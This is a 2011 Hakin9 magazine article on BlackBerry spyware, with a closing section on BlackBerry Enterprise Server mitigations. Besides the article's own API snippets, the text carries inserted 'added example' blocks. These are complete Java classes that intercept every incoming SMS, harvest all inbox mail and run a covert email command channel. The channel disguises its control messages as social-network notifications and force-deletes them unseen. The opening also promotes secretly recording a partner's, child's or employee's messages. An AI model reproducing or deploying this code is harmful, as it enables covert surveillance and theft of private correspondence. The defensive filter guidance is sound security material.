The Backroom Message That’s Stolen Your Deal

Do you want to learn more about bigwig? Is someone keeping secrets from you? Need to silently record text messages, GPS locations and call info of your child or employee? Catch everybody at whatever you like with our unique service.
http://hakin9.org/mobile-security-hakin9-042011/


ATTACK

What you will learn…
  • Every email (or SMS) message that is part of business correspondence can be intercepted
  • A message can activate spyware

What you should know…
  • Basic knowledge of BlackBerry security

"It lets you intercept SMS or email messages via the Internet, catch cheating wives or cheating husbands, stop employee espionage, protect children, etc." You have just read yet another advertisement summarising spyware products for every mobile OS. Windows Mobile, Symbian and iOS (iPhone) are undoubtedly the most popular with consumers, and none of them has ever had a distinct security policy. BlackBerry devices, however, are among the world's top devices, and for an explicable reason: they have one defensible, unique feature, a proven secure channel for transmitting data between endpoints, and to date there is no successful decoder for the ciphered traffic.

These days most people use a mobile phone. It has made our lives easier and increased communication, but it also creates opportunities for cheating. Suppose you believe your lover is not being faithful and you want to confirm your suspicions or allay your fears; the main evidence would be a new lover linked to your partner. Telltale signs are SMS messages to the same number late at night or early in the morning, or both; if the same number also appears as a call at unsocial hours, you really have something to be concerned about. However, there can be a perfectly innocent explanation for activity like this, and it is worth pausing before jumping to conclusions. If the number that keeps appearing belongs to a family member or a good friend, it might just be that your partner is planning a surprise for you and has enlisted their help, so check the number carefully, particularly if it seems familiar to you.

Nothing personal...
Everyone knows that reading other people's letters or diaries without the author's permission is unethical. All personal correspondence, and even plain information such as SMS messages, the address book, email and ICQ history, falls under the fashionable word Privacy (Private Data, Data Privacy). Any attempt to get at it behind the author's back is a direct violation of individual privacy.

At some point everyone has wondered what people write to each other, or what a friend or colleague has written. There is not necessarily malicious intent behind it: do they have something to hide, are they hatching a plot? Omnivorous curiosity is one of the most popular human vices, and it helps fraudsters earn considerable sums of money every day. They are always ready to help anyone get into somebody else's phone book, email or social networking pages. After all, who would not want access to a cherished friend's (lover's, boss's, foe's) chats? The victim's mobile phone is the coveted goal: this storage place may shed light on things wrapped in mystery. Is there no way to read others' emails or SMS? You can take the phone and read whatever you are interested

Hakin9 04/2011, p. 22
in. It is one of the easiest ways to do it. You may also provoke your victim into letting you get acquainted with their private data. It should be noted that lack of knowledge is the leading topic of the hour; now the plot thickens into a call for a vote of confidence. Really, how often does software ask you to grant it access to private data? Do you trust software with your own secrets? Take some kind of program that modifies the SMS and email graphical controls, for instance. When you install it you are asked to set an access permission (as a general permission), a send and receive permission, etc. There is no reason for concern in this case, right? You install what you like despite the prospect of data theft. If we take a Facebook (or Twitter) application, the confidence level should be lower, because such apps use HTTP/HTTPS over EDGE/3G/WiFi as their common data channel, and on top of that they can receive news about new friends or upload a status by sending SMS.

Routines behind the screen...
Message (SMS or email) interception is a great opportunity to take control of somebody and stay invisible. You are able to read emails as well as build a telephone directory (subscriber list) from the text messages within a minute. This kind of interception is in demand in such situations. Moreover, it is a real chance to feel like a spy and to obtain information that cannot be obtained legally. Some years ago such interception was science fiction, available only to the intelligence services. Today you do not need to be a secret agent and you do not need a high level of experience. The explanation is quite simple: you only need to hit the target with your legacy hammer. There is no way to misuse a hammer, is there? You can hammer a nail into a board, or you can hammer a nail into somebody's head. There is nothing reprehensible about the tool itself. Public tranquillity, as protectability, is the flip side of vulnerability, and vice versa.

For some time now the Internet has been flooded with spam proposing a service to read other people's posts. Kaspersky Lab reported one of these in February 2009: users were promised the ability to read others' SMS, and by clicking the junk link they downloaded a Trojan called Trojan.Win32.Agent2.dbq (Kaspersky Lab's notation). The next cherished zone is personal email storage. Email correspondence is in no less demand than SMS. Deceivers offer email-account password-breaking services: at first they also ask for an upfront payment via SMS and never break into the account. There is another kind of deception. Someone announces security holes in the Google or Yahoo email systems and offers to get the password of any mailbox. You need only send your (!) own password and the answer to your secret question (what is your favourite colour?) to the email address given; supposedly this tricks the email system (Google, Yahoo), and in return you will receive a list of passwords for any email system. Come again! It is simply a substitution of your account's password for the desired password. So, there is no fraud! Really, there are a lot of security holes (this is just one kind of them); really, there is a way to steal a password. Are you ready to name this hole? Nobody but you! The email address in the received message is just the intruder's own email account. This is how he gets other people's passwords, and he does not want anyone to confide in. Thus, all offers of access to others' correspondence have two goals: trick the user out of money or infect the user's computer with a virus. In this case the attacker also captures the user's own password.

Malware Design
The ultimate goal is to show which API routines help to design such malware. The list of API classes that must be imported to re-create an SMS listener is presented in Listing 1. The first public class, Date, represents a specific instant in time, with millisecond precision.

Listing 1. API routines to design the "SMS intercept" part of the malware

    import java.util.Date;
    import javax.microedition.io.Connector;
    import javax.wireless.messaging.BinaryMessage;
    import javax.wireless.messaging.Message;
    import javax.wireless.messaging.MessageConnection;
    import javax.wireless.messaging.TextMessage;

Listing 2. Retrieve the message

    // Port 0 delivers a copy of every inbound SMS to this connection
    MessageConnection sms_connection = (MessageConnection) Connector.open("sms://:0");
    Message sms_message = sms_connection.receive();   // blocks until a message arrives
    Date sms_date = sms_message.getTimestamp();
    String sms_address = sms_message.getAddress();    // the sender's address for a received message
    String sms_body = null;
    if (sms_message instanceof TextMessage)
    {
        TextMessage temp_text = (TextMessage) sms_message;
        sms_body = temp_text.getPayloadText();
    }
    else if (sms_message instanceof BinaryMessage)
    {
        byte[] temp_byte = ((BinaryMessage) sms_message).getPayloadData();
        // convert binary data to text
        sms_body = new String(temp_byte, "UTF-8");
    }

www.hakin9.org/en, p. 23
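The following is an added example, not code from the article: it wires Listing 1 and Listing 2 into a complete interceptor class so that a practitioner can see the whole shape of the "SMS intercept" part. The message listener is the JSR-120 MessageListener; the store() sink and the collected() accessor are hypothetical stand-ins for whatever a real sample would do with the records (persist them, or send them out over HTTP). Like any such application it still needs the message-access permission the user or IT policy grants it.

```java
import java.io.IOException;
import java.util.Date;
import javax.microedition.io.Connector;
import javax.wireless.messaging.BinaryMessage;
import javax.wireless.messaging.Message;
import javax.wireless.messaging.MessageConnection;
import javax.wireless.messaging.MessageListener;
import javax.wireless.messaging.TextMessage;

/*
 * Added example (not the article's code): a passive SMS interceptor.
 * Port 0 hands this connection a copy of every inbound SMS. The message
 * still lands in the user's inbox, which is why the article disguises its
 * later control messages as spam instead of trying to hide them.
 */
public final class SmsInterceptor implements MessageListener, Runnable {

    private final MessageConnection conn;
    private final StringBuffer collected = new StringBuffer();   // hypothetical in-memory sink

    public SmsInterceptor() throws IOException {
        conn = (MessageConnection) Connector.open("sms://:0");
        conn.setMessageListener(this);
    }

    /* Called once per inbound message. The callback must return quickly and
     * must not call receive() itself, so the work goes to a reader thread. */
    public void notifyIncomingMessage(MessageConnection c) {
        new Thread(this).start();
    }

    public void run() {
        try {
            Message m = conn.receive();            // the message that triggered the callback
            store(format(m));
        } catch (IOException e) {
            // spyware fails silently: no dialog, no log the user could notice
        }
    }

    /* Builds the "Sender :: ... Body :: ..." record format shown in the article. */
    static String format(Message m) throws IOException {
        String body;
        if (m instanceof TextMessage) {
            body = ((TextMessage) m).getPayloadText();
        } else if (m instanceof BinaryMessage) {
            body = new String(((BinaryMessage) m).getPayloadData(), "UTF-8");
        } else {
            body = "<unsupported message type>";
        }
        Date when = m.getTimestamp();              // may be null on some networks
        return "Sender :: " + m.getAddress()
             + (when != null ? " At :: " + when : "")
             + " Body :: " + body;
    }

    private synchronized void store(String record) {
        collected.append(record).append('\n');
    }

    /* Everything captured so far, one record per line. */
    public synchronized String collected() {
        return collected.toString();
    }

    public void close() throws IOException {
        conn.setMessageListener(null);             // null removes the listener
        conn.close();
    }
}
```

The reader thread is the important design point: JSR-120 forbids blocking inside notifyIncomingMessage(), so the callback only spawns a thread, and receive() is called from there.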
The Message interface is the base interface for the derived interfaces that represent various types of messages. It contains the functionality common to all messages:

  • getAddress() – Returns the address associated with this message. If this is a message to be sent, then this address is the recipient's address. If this is a message that has been received, then this address is the sender's address.
  • getTimestamp() – Returns the timestamp indicating when this message has been sent.

The MessageConnection interface defines the basic functionality for sending and receiving messages. We have a couple of routines here. The receive() routine receives a message; if there are no messages waiting for this MessageConnection, the method blocks until either a message for this connection is received or the MessageConnection is closed. To be told about a message without blocking, register a MessageListener on the connection: when an incoming message arrives, its notifyIncomingMessage(MessageConnection) method is called, once for each incoming message to that MessageConnection. The RIM-specific OutboundMessageListener interface (net.rim.blackberry.api.sms) extends it with notifyOutgoingMessage(Message), which is called when an SMS message is sent from the device.

The second malware part is designed to catch email messages. In this case a different routine set must be used, and it is a signed one (the net.rim.blackberry.api.mail package is a controlled API, so the application must be signed); it is described in Listing 3.

Listing 3. API routines to design the "email intercept" part of the malware

    import net.rim.blackberry.api.mail.Address;
    import net.rim.blackberry.api.mail.Folder;
    import net.rim.blackberry.api.mail.Message;
    import net.rim.blackberry.api.mail.Session;
    import net.rim.blackberry.api.mail.Store;

Folder INTEGER Constants
  • DELETED – A Folder containing deleted messages.
  • DRAFT – A Folder containing draft messages.
  • FILED – Contains items that are filed in a Folder.
  • INBOX – A Folder containing received messages.
  • INVALID – A Folder containing items marked as invalid.
  • JUNK – A Folder for junk mail.
  • OTHER – A Folder that the user created – a personal folder.
  • OUTBOX – A Folder containing messages in the process of being sent.
  • SENT – A Folder containing sent messages.
  • UNFILED – Contains items that are not currently filed in a Folder.

The Session class provides access to email services, storage, and transport. The Message class represents an email message. A message contains a set of header fields (attributes) and a body (contents). Messages in a folder also have a set of flags that describe their state within the folder. Received messages are retrieved from the folder of type INBOX (see the Folder integer constants).

The Folder class represents a mailbox folder on the handheld. To retrieve the list of folders it contains, call Folder.list(). We do not need anything about a folder's contents or the system folder names; to extract a folder's name, call getFullName(). It is then simple to use a loop, for (int i = 0; i < email_folder_list.length; i++), because we already have the folder list from Folder.list().

The Store class represents a message store and its access protocol, for storing and retrieving messages on the handheld. To retrieve a Store instance and access message storage on this device we invoke Session.getStore().

Listing 4. Retrieve an email message

    Session current_session = Session.getDefaultInstance();
    String folders_name = null;
    String email_from = null;
    String email_subject = null;
    String email_body = null;
    if (current_session != null)
    {
        Store current_storage = current_session.getStore();
        Folder[] flist = current_storage.list();          // top-level folders
        for (int i = 0; i < flist.length; i++)
        {
            folders_name = flist[i].getFullName();        // get the folder's name
            Message[] msgs = flist[i].getMessages();
            for (int n = 0; n < msgs.length; n++)
            {
                Address from = msgs[n].getFrom();
                if (from != null)
                    email_from = from.getAddr();
                email_subject = msgs[n].getSubject();
                email_body = msgs[n].getBodyText();
            }
        }
    }
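Listing 4 only looks at top-level folders and overwrites its four String variables on every message. The following added example (not the article's code) does what the text describes instead: it recurses through Folder.list(), keeps only folders whose type is INBOX, and accumulates one record per message in a Vector, which is then joined into a single String. The record layout ("folder | from | subject | body") is an assumption made for the example.

```java
import java.util.Vector;
import net.rim.blackberry.api.mail.Address;
import net.rim.blackberry.api.mail.Folder;
import net.rim.blackberry.api.mail.Message;
import net.rim.blackberry.api.mail.MessagingException;
import net.rim.blackberry.api.mail.Session;
import net.rim.blackberry.api.mail.Store;

/*
 * Added example (not the article's code): harvest received mail by walking
 * the whole folder tree and reading only folders of type Folder.INBOX.
 */
public final class MailHarvester {

    /* Returns one "folder | from | subject | body" record per received message. */
    public static Vector harvestInbox() throws MessagingException {
        Vector records = new Vector();
        Session session = Session.getDefaultInstance();
        if (session == null) {
            return records;                        // no mail service configured on the device
        }
        Store store = session.getStore();
        Folder[] top = store.list();               // top-level folders only
        for (int i = 0; i < top.length; i++) {
            walk(top[i], records);
        }
        return records;
    }

    /* Folder.list() returns the subfolders a folder contains, so recurse. */
    private static void walk(Folder folder, Vector out) throws MessagingException {
        if (folder.getType() == Folder.INBOX) {
            Message[] msgs = folder.getMessages();
            for (int n = 0; n < msgs.length; n++) {
                out.addElement(record(folder, msgs[n]));
            }
        }
        Folder[] sub = folder.list();
        for (int i = 0; i < sub.length; i++) {
            walk(sub[i], out);
        }
    }

    private static String record(Folder folder, Message m) throws MessagingException {
        Address from = m.getFrom();
        StringBuffer sb = new StringBuffer();      // CLDC has StringBuffer, not StringBuilder
        sb.append(folder.getFullName()).append(" | ")
          .append(from != null ? from.getAddr() : "<no sender>").append(" | ")
          .append(m.getSubject()).append(" | ")
          .append(m.getBodyText());
        return sb.toString();
    }

    /* Collapses the Vector into one String, e.g. for a single outbound request. */
    public static String join(Vector records) {
        StringBuffer sb = new StringBuffer();
        for (int i = 0; i < records.size(); i++) {
            sb.append((String) records.elementAt(i)).append('\n');
        }
        return sb.toString();
    }
}
```

Filtering on Folder.getType() rather than on the folder name matters in practice: users rename and nest folders, and on a BES-managed device the INBOX may be synchronised into a sub-folder of the service's top-level folder.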
Referring to the code above, notice that I overwrite four String objects: folders_name, email_from, email_subject and email_body. For data acquisition you should instead accumulate into a Vector ("Vector data_acq = new Vector()" from java.util.Vector) and then build a String by converting it with Utils.makeStringFromVector. You can also use a StringBuffer (the CLDC class library has no StringBuilder).

Stolen messages from the BlackBerry device:

    Sender :: InternetSMS Body :: http://www.blackberryseeker.com/applications/download/PDF-To-Go-V20_2.aspx
    Sender :: InternetSMS Body :: http://letitbit.net/download/.../Defcon14-V64-X30n-Blackjacking_Owning_the_enterprise.m4v.html

Figure 1. Application Management

Puppet theatre
Progress is interesting to watch. It happens in every area of human activity, otherwise that area vanishes from sight, and cybercrime is no exception: it rapidly improves whatever its own inhabitants use. "Malware 2.0" has been a new term in the IT security vocabulary since 2006. It describes the new generation of malicious software as a well co-ordinated, well-functioning system, and incidentally it poisons the existence of anti-virus products.

Trojans are malicious programs that perform actions not authorized by the user: they delete, block, modify or copy data, and they disrupt the performance of computers or computer networks. Unlike viruses and worms, the threats in this category cannot make copies of themselves or self-replicate. Trojans are classified according to the type of action they perform on an infected computer. According to Kaspersky Lab this class includes the following behaviours:

  • Backdoor
  • Exploit
  • Rootkit
  • Trojan-DDoS
  • Trojan-Downloader
  • Trojan-Proxy
  • Trojan-SMS
  • Trojan-Spy, etc.

The most interesting subclasses are Backdoor and Trojan-DDoS. The second will be covered in a later article; here we discuss a backdoor's behaviour. Backdoors are designed to give malicious users remote control over an infected computer, so they resemble many administration systems designed and distributed by software developers. These programs make it possible to do anything the intruder wants on the infected handheld: send and receive files, launch or delete files, display messages, delete data, etc. Programs in this category are often used to unite a group of victim computers into a botnet or zombie network, which gives malicious users centralized control over an army of infected computers that can then be used for criminal purposes.

Listing 5. Delete an email message

    import net.rim.blackberry.api.mail.Folder;
    import net.rim.blackberry.api.mail.Message;
    …
    Message[] emailMessage = emailFolder.getMessages();
    for (int i = 0; i < emailMessage.length; i++)
    {
        // true forces deletion even if the message is marked as saved
        emailFolder.deleteMessage(emailMessage[i], true);
    }

Figure 2. Set application's permissions

www.hakin9.org/en, p. 25
The most popular message control channel is SMS (or MMS). The advantages of SMS are rapid access, steadiness and reliability. In BlackBerry's case email is a second sufficient channel, capable of the same rapid turnaround. How to catch SMS or email messages I discussed above; so if we are going to create a powerful command-and-control system (CC from here on) we need to know how to delete such a message. Part of the code to delete all the email is in Listing 5. The boolean argument of deleteMessage(..., true) forces deletion even if the message is marked as saved. If you have just caught an email message through a FolderEvent(Folder folder, int type, Message message), delivered to a FolderListener as

    public synchronized void messagesAdded(FolderEvent e)
    {
        Message msg = e.getMessage();
    }

then you can delete it with msg.getFolder().deleteMessage(msg, true) (deleteMessage belongs to Folder, not to Message).

Figure 3. Firewall Management

Unfortunately, the RIM API does not allow access to SMS messages that have already been received or sent. In spite of that, it is still possible to disguise our control command as some kind of spam, e.g. "+323232 User MegaFriend has sent message to you". Isn't that a Facebook notification? It does not matter much that such an SMS comes from a different sender number; what matters is that your device has received a control message.

Mitigation
BlackBerry Enterprise Server offers several mitigations. First, you can turn on confirmation of each sent message, for the case where a BlackBerry Trojan is able to spend money and leave you to pay the bill. This rule is found at IT Policy > Common Policy Group > Confirm On Send. Even if you set it to True, it only affects the user's own actions; in other words, no program will ever notify you when it sends a message. You can also set trusted applications in Application Control > Message Access. A more radical solution is to disable SMS and MMS via IT Policy > Device Only Items > Allow SMS and IT Policy > Common > Disable MMS; set the first to False and the second to True.

A more powerful way is to create a trusted domain. This lets us fill a white list with trusted senders and recipients, and a black list of phrases, senders and recipients to filter out. First of all, check and turn on your BES filter: IT Policy > Security > Firewall Block Incoming Messages. Here SMS, MMS and Enterprise Message should be checked as the filtered types (an Enterprise Message is nothing other than an enterprise email message). After that, fill a white list in IT Policy > Security > Firewall White List Address with, e.g., *@blackberry.enterprise.com. Take

Figure 4. Exceptions of the black list
Figure 5. Adding a new exception

www.hakin9.org/en, p. 26
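The email side of the control channel described above and in Listing 5, as an added example that is not the article's own code: a FolderListener inspects each arriving message, recognises the disguised "notification" the article uses as bait, handles the embedded command, and force-deletes the message from its folder before the user sees it. The bait subject, the "cmd:" body marker and the two command names are assumptions invented for the example; handle() is a stub standing in for the backdoor's real actions.

```java
import net.rim.blackberry.api.mail.Folder;
import net.rim.blackberry.api.mail.Message;
import net.rim.blackberry.api.mail.Session;
import net.rim.blackberry.api.mail.Store;
import net.rim.blackberry.api.mail.event.FolderEvent;
import net.rim.blackberry.api.mail.event.FolderListener;

/*
 * Added example (not the article's code): an email command channel that
 * hides its own control messages. Everything about the message format is
 * assumed for the example.
 */
public final class MailCommandChannel implements FolderListener {

    /* Disguise: the subject a social-network notification would carry. */
    static final String BAIT_SUBJECT = "User MegaFriend has sent message to you";
    static final String CMD_PREFIX = "cmd:";

    public boolean install() {
        Session session = Session.getDefaultInstance();
        if (session == null) {
            return false;                          // no mail service configured
        }
        Store store = session.getStore();
        store.addFolderListener(this);             // fires for every folder in the store
        return true;
    }

    public void messagesAdded(FolderEvent e) {
        Message msg = e.getMessage();
        if (msg == null) {
            return;
        }
        try {
            String cmd = extractCommand(msg.getSubject(), msg.getBodyText());
            if (cmd == null) {
                return;                            // ordinary mail, leave it alone
            }
            handle(cmd);
            Folder folder = msg.getFolder();
            folder.deleteMessage(msg, true);       // true: delete even if marked saved
        } catch (Exception ex) {
            // On failure the message stays, but its bait subject still reads as spam.
        }
    }

    public void messagesRemoved(FolderEvent e) {
        // not needed for the control channel
    }

    /* Returns the command text, or null when this is not a control message. */
    static String extractCommand(String subject, String body) {
        if (subject == null || body == null || subject.indexOf(BAIT_SUBJECT) < 0) {
            return null;
        }
        int at = body.indexOf(CMD_PREFIX);
        if (at < 0) {
            return null;
        }
        int start = at + CMD_PREFIX.length();
        int end = body.indexOf('\n', start);
        String cmd = (end < 0) ? body.substring(start) : body.substring(start, end);
        return cmd.trim();
    }

    /* Hypothetical dispatcher; a real backdoor would map these to actions. */
    private void handle(String cmd) {
        if (cmd.equals("dump-sms")) {
            // send the SMS records collected so far
        } else if (cmd.equals("dump-mail")) {
            // send the harvested mail
        }
    }
}
```

This is exactly the traffic the BES filter rules in the Mitigation section are meant to catch: a Filter Rule on the Subject or From field, or a white list that admits only the trusted domain, stops the bait message at the server, so it never reaches the device and the listener never fires.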
notice that substitution characters like the asterisk "*" can be used, and you can add further values separated by commas. The first step is done: you have just created a trusted domain filled only with white addresses.

The second step is filling in the black tags. First of all, you must turn that option on, too: the rule IT Policy > Filter Rule > Condition and Action > Enabled set to True switches on filtering of your emails. The second rule, IT Policy > Filter Rule > Condition and Action > From, gives the opportunity to make messages from unknown senders vanish; here you can type something like stealer@gmail.com, hacker@yahoo.com. The same rule's IT Policy > Filter Rule > Condition and Action > Sent To can filter outbound messages that may carry stolen data to an intruder's or non-trusted account. To control transferred subjects and bodies, set disallowed phrases in the rules IT Policy > Filter Rule > Condition and Action > Subject and IT Policy > Filter Rule > Condition and Action > Body. After that, check the last rule, which indicates how black messages are delivered: in the first case the device receives only the headers; in the second case the BES holds such messages and does not allow the device to download them.

If you are a BIS consumer, always check permissions when downloading an application, to grant or disallow access to email or SMS. You can also set them after you have downloaded the application, in Options > Device > Application Management > Edit Permissions. To fill a white list with the device firewall enabled, follow Options > Security > Firewall, check the desired features and add a white rule.

Conclusion
Spyware is one of the most common types of malware. While the term spyware suggests software that secretly monitors the user's computing, the functions of spyware extend well beyond simple monitoring. It is designed to spy on what you are doing on your device: it collects information about the web pages you usually visit, your Internet surfing habits and the messages you exchange. It also interferes with user control of the computer in other ways, such as installing additional software, redirecting web browser activity or stealing personal information (including financial information such as credit card numbers), and then sends it to others without your knowledge. To get installed, however, it has to hide itself, in demo games for example. The presence of spyware is typically hidden from the user and can be difficult to detect. It is not very common; it is not the mass of viruses, Trojans and backdoors that anti-virus products can stop, otherwise everybody would know about it. Like many recent viruses, however, spyware by design exploits infected computers for commercial gain. Even if you think your information is not important to an intruder, they can use your device's resources against others, or steal data without ever letting you know about it. By the way, they also cover their tracks and leave your device (and you) holding the baby.

On the 'Net
  • http://docs.blackberry.com/en/admin/deliverables/12063/BlackBerry_Enterprise_Server-Policy_Reference_Guide-T323212-832026-1023123101-001-5.0.1-US.pdf – BlackBerry Enterprise Server Version 5.0, Policy Reference Guide, RIM
  • http://docs.blackberry.com/en/developers/deliverables/11961/BlackBerry_Java_Application-Feature_and_Technical_Overview--789336-1109112514-001-5.0_Beta-US.pdf – BlackBerry Java Application Version 5.0, Feature and Technical Overview, RIM
  • http://docs.blackberry.com/en/developers/deliverables/9091/JDE_5.0_FundamentalsGuide_Beta.pdf – BlackBerry Java Application Version 5.0, Fundamentals Guide, RIM
  • http://www.blackberry.com/knowledgecenterpublic/livelink.exe/fetch/2000/8067/645045/8655/8656/1106255/BlackBerry_Application_Developer_Guide_Volume_1.pdf?nodeid=1106256&vernum=0 – BlackBerry Application Developer Guide Volume 1: Fundamentals (4.1), RIM
  • http://www.blackberry.com/knowledgecenterpublic/livelink.exe/fetch/2000/8067/645045/8655/8656/1106255/BlackBerry_Application_Developer_Guide_Volume_2.pdf?nodeid=1106444&vernum=0 – BlackBerry Application Developer Guide Volume 2: Advanced Topics (4.1), RIM
  • http://www.blackberry.com/developers/docs/4.2api/ – RIM Device Java Library 4.2.0 Release (Javadoc), RIM
  • http://docs.blackberry.com/en/developers/deliverables/15497/BlackBerry_Smartphone_Simulator-Development_Guide--1001926-0406042642-001-5.0-US.pdf – BlackBerry Smartphone Simulator Version 5.0, Development Guide, RIM
  • http://docs.blackberry.com/en/developers/deliverables/1077/BlackBerry_Signing_Authority_Tool_1.0_-_Password_Based_-_Administrator_Guide.pdf – BlackBerry Signature Tool 1.0, Developer Guide, RIM

YURY CHEMERKIN
Graduated from the Russian State University for the Humanities (http://rggu.com/) in 2010. At present a postgraduate at RSUH. Information Security Analyst since 2009; currently works as a mobile information security researcher in Moscow. E-mail: yury.chemerkin@gmail.com. Facebook: http://www.facebook.com/people/Yury-Chemerkin/100001827345335. LinkedIn: http://ru.linkedin.com/pub/yury-chemerkin/2a/434/549

www.hakin9.org/en, p. 27